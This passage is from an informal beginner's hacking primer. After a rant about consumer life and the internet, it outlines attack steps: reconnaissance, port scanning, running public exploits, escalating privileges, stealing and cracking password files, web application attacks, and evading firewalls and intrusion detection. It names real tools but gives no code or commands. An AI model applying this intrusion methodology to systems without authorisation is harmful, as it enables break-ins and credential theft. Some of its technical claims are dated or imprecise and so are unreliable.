college and grad school so they can start on the same cycle. We go through a mid-life crisis where we wonder what the point of it all is. We retire and get sick with degenerative diseases from a lifetime of eating an unhealthy, fast-food, meat based died and from sedentary living– miserable desk jobs and hours spent vegetating in front of corporate pablum on television. As we degenerate, bored, lonely, and isolated in a society that overvalues competition and undervalues community, we are shipped off to nursing homes, eventually end up in hospitals that attempt to prolong miserable and unhealthy lives, with surgical procedures and drugs and radiation treatments that are tremendously profitable to insurance companies, hospitals, physicians, and medical equipment and drug manufacturers, but do little to address the underlying issues of poor health and often make us even sicker. Eventually we die, providing income to the undertakers, coffin manufacturers, funeral parlours, and cemeteries to turn our corpses into formaldehyde filled hazardous waste that will not be cycled back into the ecosystem locked in boxes made of dead rainforest trees or strip-mined metals. This is considered “a successful life’ for the Western middle class and lower portions of the upper class. Apparently, I got a bit carried away, but follow me and you will see where I am getting at.

Don’t panic, though, for all is not lost. We have the unbelievable luxury of living in the internet era. Now this is a whole new topic again, and a huge one indeed, but it is very relevant to this study for certain reasons. If you think back some years ago, access to information and knowledge was very, very different. First of all, there used to be one horrible restriction to acquire information: it had a price. To learn how to be a doctor, computer programmer, lawyer, journalist, biologist, builder, you had to buy many, expensive books and/or go to expensive schools. You very evolution itself was too damn hard, since every time you encountered a problem, an unknown condition in your field, you had to go to public libraries, make expensive telephone calls to other fellow professionals, spend time investigating and if you were lucky enough to find a solution, you would rely on it just because it was the only solution you were able to locate. It is not the case today. Today’s internet is a gift. An ever-changing, almost organic collection of all sorts of information that brings together individuals and ideas of all races, social classes, religions, scientific fields and arts. The power of this mechanism lies in its multi-inclusive nature. Looking for an answer to a question you might have, you are very likely to encounter tons of crap, some quite good approaches, and a few superb ones. You will, though, invariably gain the ability to evaluate, judge, search and think for yourself. And that, my friend, is a tremendous skill. In fact, it is the very root of becoming a superior human being and understanding the world you happen to live in, in depth, so you can make conscious choices and reject this or that lifestyle that ‘they’ are trying to enforce upon you. Computer (or real life) hacking just happens to be one of the benefits drawn from this new skill that you will (hopefully) acquire. So, if there is one service you have to buy in this damn world, it is, in my humble opinion, a good internet connection. Get DSL. Assuming that living in London you speak English, internet access is all you are ever going to need ( provided that you have a computer ‘ a crappy one will do, get your uncle’s old PC that she was planning to donate to charity if you have to), plus some spare time to invest.

Trust me in this one, reader: It will not always be like that. The internet is a very new invention, and a very groundbreaking one. As it happens with all radical inventions in the history of mankind (the wheel, electricity, relativity) it takes quite some time until people are eventually able to govern the new invention’s power, and restrict its potential misuse through many rules, legislation and supervision. The early stages are somewhat ‘experimental’ and very liberal. Man (including the superior forces running the show) has realised the full potential of the internet as a generous profit-making source. Due to the fact that one of our main characteristics is greed, people got quickly addicted (and dependent) to the internet, and now refuse to let go. Fortunately for the rest of us, not profit-oriented, various healthy tendencies including open source information exchange grew in parallel and got their place quietly in the internet. Because of the fact that no-body actually ‘owns’ the internet, it is deemed very unlikely that the internet is going to shut down some time soon for ‘general maintenance and regulations introduction’. Control is happening, though. Slowly it spreads over the wires through mechanisms like legislation, and sniffing. There are however countermeasures to being supervised: Cryptography is a good one. Cryptography has been made available to the masses about a decade ago through a program called PGP (Pretty Good Privacy) written by a genius hacker called Phil Zimmerman. Cryptography is another, very complicated issue that we are not going to cover here, but it is worth mentioning that the strength of your encrypted messages relies on the size (in bits) of the encryption algorithm. If 40 bits are used, it’s quite easy to decrypt. If 256 bits are used it’s bloody difficult, even for governments or intelligence agencies to decrypt your message. This is because the extent of difficulty introduced to a cipher by adding just one bit doubles, so that a cipher with 41 bits is twice as hard to crack (takes twice the time) compared to one using 40 bits. This is why the US government has put restrictions to the exports of cryptographic algorithms (40 bits I think), and they have classified cryptography under ‘weapons’ so that they can maintain control of the game. Moral of the story: (Ab)use the internet in its present form, for it might not last that long.

While it is possible to hack computer networks without being a programmer (or at least being able to read and understand code) I strongly suggest you acquire that skill. Remember, the goal is not to scratch the surface (as sick of it all says), but to get a shovel and start digging. If you want to hack wisely, you have to understand how the tools you are going to use actually work. That’s why I personally support the ‘open source’ approach, because it gives you access to the underlying architecture of all the tools you are using. In that way, you can really understand what’s going on behind the scenes, and perhaps modify anything as you see fit. The languages commonly used in the computer security field are Ansi C (often used in a scripting approach under the UNIX shell), and many general purpose scripting languages such as Tcl, Perl and Python. I have seen apps recently written in pure Java, though this language is generally not preferred in the underground. Moreover, you must get acquainted with the basic concepts of computer networking. There are a few protocols which are extremely popular and you should know how they work. These include the TCP/IP protocol suite (including UDP and ICMP), the mail protocols (POP3 and SMTP) and various others such as HTTP. You should also get familiar with the major Operating Systems, Windows and Linux. There are things you can do with one but can’t with the other, so you should learn and use both. If you have no fuckin’ clue what I’m talking about in these last few lines, then I strongly urge you to get an internet connection (see above), and start using www.google.com to educate yourself. I shall warn you here, reader, that the legislation on computer attacks is rapidly changing, and getting stricter every day. So as soon as (and if) you ever start launching attacks against computer networks, be sure to launch them against networks you own, or ones that you have formal authorisation to perform testing against, to avoid getting in trouble. It is perfectly possible to hide your tracks and clean up your mess effectively, but it is a very daunting task, something that comes with experience. As a newbie, you might as well forget about it for the time being.

I suspect what you might be thinking ‘Hey, that’s all good, now teach me how to hack!’, and, gee, I really hope that I’m wrong. See, there is a reason why I decided to release this document in this very event – the resistance festival. Taking into account the fact that you came here, you are quite likely a person who already has an ‘alternative’ approach to life. You try to differentiate yourself from the mass through unconventional music and other art forms, ‘revolutionary’ appearance (we have all been there at one time or another), maybe travelling and the likes. If you have followed me until this point, you have hopefully realised that the mission of this document is not to provide some quick guide to getting porn and certainly not illegally accessing your girlfriend’s hotmail account. It is to teach you how to be a creative problem solver, and how to seek knowledge. The means employed to try and get you started is computer hacking. This is because it just so happens that I have an elementary knowledge of this field, I consider it interesting, and I feel that there is a great potential to it. If, on the other hand, you are one of them people who want to learn how to hack computer systems because it is considered ‘elite’, or to get some free shit, while not having genuine interest in improving yourself, perhaps the security mechanisms employed in the IT industry nowadays, and eventually getting (more) wise then to hell with you anyway. Forget you ever read this document and go back to whatever you were doing. The community does not need you.

Section II: Doing it

Although I have been fiercely propagating creativity, I do believe that it is important to follow (not religiously though) a standard methodology when hacking. This ensures that you hack effectively and do not forget any necessary steps due to your enthusiasm or various other reasons. Of course, the methodology you choose should be one you have studied thoroughly (or created it yourself ‘ even better), and customized to your specific needs. What we are talking about, here, is a hacked methodology, by means of our prior definition of what hacking essentially is. A nice, open-source methodology for security testing is provided by the fine folks at ISECOM, and is called OSSTMM. I suggest you have a look at it. Now moving on to the juicy bits.

Step 1: Profiling the target (fingerprinting): Just like in real life, the first thing you need to when planning an attack is information gathering. If your target was to break in a house, you wouldn’t just smash the window and enter, not if you didn’t want to get busted that is. The same goes for hacking. You main source to gather information is, you guessed it, the internet. Use the main search engines (Google is good, but there’s tons of other search engines that you might want to have a look at, see Fravia’s ww.searchlores.org to learn how to find anything and everything on the web). Identify IP addresses, Domain Name Servers, telephone numbers (might come in handy for war dialling) , key personnel names; try to find messages in public message boards seeking technical information on specific problems they might have, for this might reveal specific software or hardware they are running, as well as version numbers. Gather e-mail addresses and e-mail server IPs, articles written by the target’s personnel, whatever seems relevant and you can lay your hands on. Use tools such as SamSpade, query the public Whois databases (like www.ripe.net), do what you have to do, be creative. This way, you will plot a nice picture of the target, though public channels, without having to query the target at all. This phase might seem dull to you, but it’s the quintessence of hacking. Without this information, you will be surely lost and helpless, in danger of knocking other people’s virtual doors, or even worse, knocking in vain where it is unlikely that you will ever get an answer.

Step 2: Scanning & Beyond: Now comes the point where you reckon you have gathered enough information to start getting more active. You have discovered several public facing devices perhaps a couple of firewalls, routers, Web and Mail Servers and you wonder what you can do to them. This is when you start scanning your target. The art of scanning attempts to find out what particular services and program daemons are listening, and on which ports. While there are several methods (Xmas, Null, Full, UDP) to discover such information, the most common and effective one is to send synchronisation (SYN) requests to your target. This is also known as the half-open TCP connection, and usually it manages to obtain a list of ports which demonstrated an interest, revealing that there is something running there. When there is something running, it can probably be exploited. You can use tools like Nmap by Fyodor, or Superscan(GUI)/Scanline(command line) by Foundstone. There are many free scanners out there, you go and have a look for yourself. An indispensable part of port scanning is the so-called banner grabbing. This functionality is included nowadays with many of the freely available scanners and what it does is try to tell you more about what it has found, such as which piece of software is active, what version it is running etc. There is a beautiful tool capable of doing myriads of things, that might help you in this goal too, and this tool is called NetCat. Netcat tries to establish a remote connection to a user-defined port, and sometimes it can achieve that, often revealing sensitive, useful information that will help you better profile your target’s vulnerabilities. Alternatively, you can use a splendid free tool called Nessus, which does just that, without getting you into manual trouble at all. Nessus is a general purpose scanner, which runs off a constantly updated vulnerability database. If you run Nessus against your target, it will inform you of any specific holes it has found, and will propose remedial action. If you like it manual, though, you can now browse to a public vulnerability database (hint: www.securityfocus.com), and see which (if any) exploits are applicable in your situation.

Step 3: Exploitation: There you are, you have found at least one machine that’s running a service vulnerable to some exploit you are now aware of. You can try to exploit the hole reported, using publicly available exploit code, or when you have become a competent hacker, perhaps write your own exploit. Not all exploits will provide you with System privileges in your target system; many of the security problems are of a different nature, some can cause Denial of Service Attacks (another big topic), others are related with more subtle issues, such as ineffective logging. Give it a try, though. See if the problem you have spotted is likely to cause ‘remote arbitrary code execution’. If the problem is a buffer overflow, your chances are good. Check out the MetaSploit framework, an experimental website dedicated to exploit development and research. With some luck, you might end up having System privileges in your target network. This effectively means you can do whatever you want. Even if you have not achieved to break in with Systems privileges, you might try to escalate your privileges while inside. For that, you can use local exploits, a different family of exploits. Use your imagination and creativity. There is no strict rule as to what you can do. You can attempt to go even further, perhaps by obtaining a copy of the local password file. In modern OSs, the password file is encrypted so you ‘d better transfer a copy of the password file to your local machine and try to crack it later using one of the many, free password crackers. You might now be thinking ‘Hey what’s all that crap you said before that strong cryptography is extremely difficult to crack’? There is one condition under which cryptography is effective: that the user chooses a good password. See, most of the times the cryptographic algorithm generates a hash of the password provided. A hash is a mathematical one-way function that’s meant to be extremely difficult to reverse. What password crackers do, effectively, is to try to match weak passwords (taken from password lists) with the equivalent entries in a hash file. A different approach (more lengthy indeed) is to try all possible combinations to match a password and its hash. These approaches are tagged Dictionary and Brute Force attack, respectively.

Step Null: Web Application Hacking: A category of devices that deserves special treatment is that of Web Servers. To you, the newbie, this probably can be interpreted as website hacking. Websites sit on machines called Web Servers, which run special software to achieve their goal (serve web content to you). We classify this as ‘application hacking’ because most of the stuff runs at the application (the highest) layer of the OSI seven-layered model. There’s a bunch of nasty things you can do to web applications, including, but not limited to SQL injection, path traversal, and cross site scripting. The list goes on. For a very good interactive tutorial on application testing, I refer you to the WebGoat (www.owasp.org). As far as automated Web app scanning, there’s a fine tool called Nikto which launches specialised attacks to test security and/or patching level. Manually speaking, there’s a suite of tools called proxies which you will find very useful if you are interested in application testing. Proxies basically sit between you and the web server, acting as a man-in-the-middle. All requests that you send to the web server can be intercepted and modified by the proxy before they leave your machine. In this way, you can craft customised requests, mess around with HTTP, manipulate cookies, change fields as you see fit, and see what happens. Some nice, free proxies for Windows are Odysseus, Achilles and WebScarab.

Step Nullx02: Firewall Hacking / IDS evasion: Due to the increase in electronic attacks, the high availability of information and tools, and human stupidity, today’s IT landscape is very tight. One can envisage a company’s network as a castle, without an easy way in. Devices called Firewalls can be thought of as the walls protecting the castle; Intrusion Detection Systems can be viewed as dog guards. What a firewall effectively does is take the responsibility to define which services and protocols will be allowed in and out of the caste. It’s a passive, but effective, means of defence if configured correctly. IDS systems usually work with attack signatures. Their role is to be more energetic, logging and preventing potential attacks. They also attempt to stop so-called 0-day hacks by applying intelligent hostile activity recognition methods to incoming traffic, even when there is no actual match to one of the attack signatures in the database. Firewall hacking is difficult and requires skill and creativity. One simple approach is to try and tunnel hostile traffic through a port/service that is being permitted by the firewall ‘officially’. Port 80, the one used to allow internal users to browse the web, is a good candidate for experimentation. IDS systems evasion can also be a difficult task, because these systems are getting more and more intelligent as we speak. One straightforward approach to attempt to cause confusion is packet fragmentation. Using tools such as the fragrouter by Dug Song, the IDS systems cannot tell with certainty whether the incoming packets constitute an attack or not, because the structure of the packets differs from the signatures in the IDS’ database. To be honest with you, this last step is a bit advanced, but I thought I’d mention it here since I had some free space, and it’s an important section in the IT infrastructure.

Considerations & Conclusions: As I said before, hacking in our era can be dangerous. Needless to say here, I do not have responsibility if you do anything stupid with the knowledge and tools that you became aware of in this document. Handle with caution. Other than that, may I wish to you, reader, good luck in you journey to knowledge through hacking. It is a difficult and certainly long journey, and you will often feel disappointed and might consider quitting. I strongly suggest that you stay, though, for it is a fascinating field and many interesting people are involved in this. I wish to stress one more time, here, that if you feel like staying with us, please do it right, and don’t be one of these lusers who go out there and Change HTML (the equivalent of Spray painting) in some old, forgotten, unprotected and unpatched web servers operated, perhaps, by the catholic church of Stoke-on-Trent. These people give a bad reputation to hacking, and are certainly not hackers themselves.

Contact: That’s it reader. I hope you have gained some useful information from this document I composed. Even more, I hope that you might be inclined to research these issues for yourself, hopefully under the right ethics and mentality, as a true hacker should. Obviously, this is just an A4 you’re holding so you probably didn’t expect me to fit in here even more information than I already did. Feel free to contact me with your opinion/feedback on this paper. If you intend to ask me any questions, though, be very careful. If you manage to convince me that you have spent considerable time on research, tried different approaches, used your brain but still have not managed to reach a sound conclusion, I will be more than happy to help you. (If I know the answer, which I seriously doubt for I am a novice as well). If, on the contrary, you send me an email with a very lame question that clearly demonstrates you fall into the dreadful category of hotmail password seekers/lazy lusers that want everything served to them without moving their little finger, then I am afraid that I will not reply to you, hell I might even try to spam your mailbox (joke). I’m sorry if my communication approach does not satisfy you, but these are the rules of the game. Take care.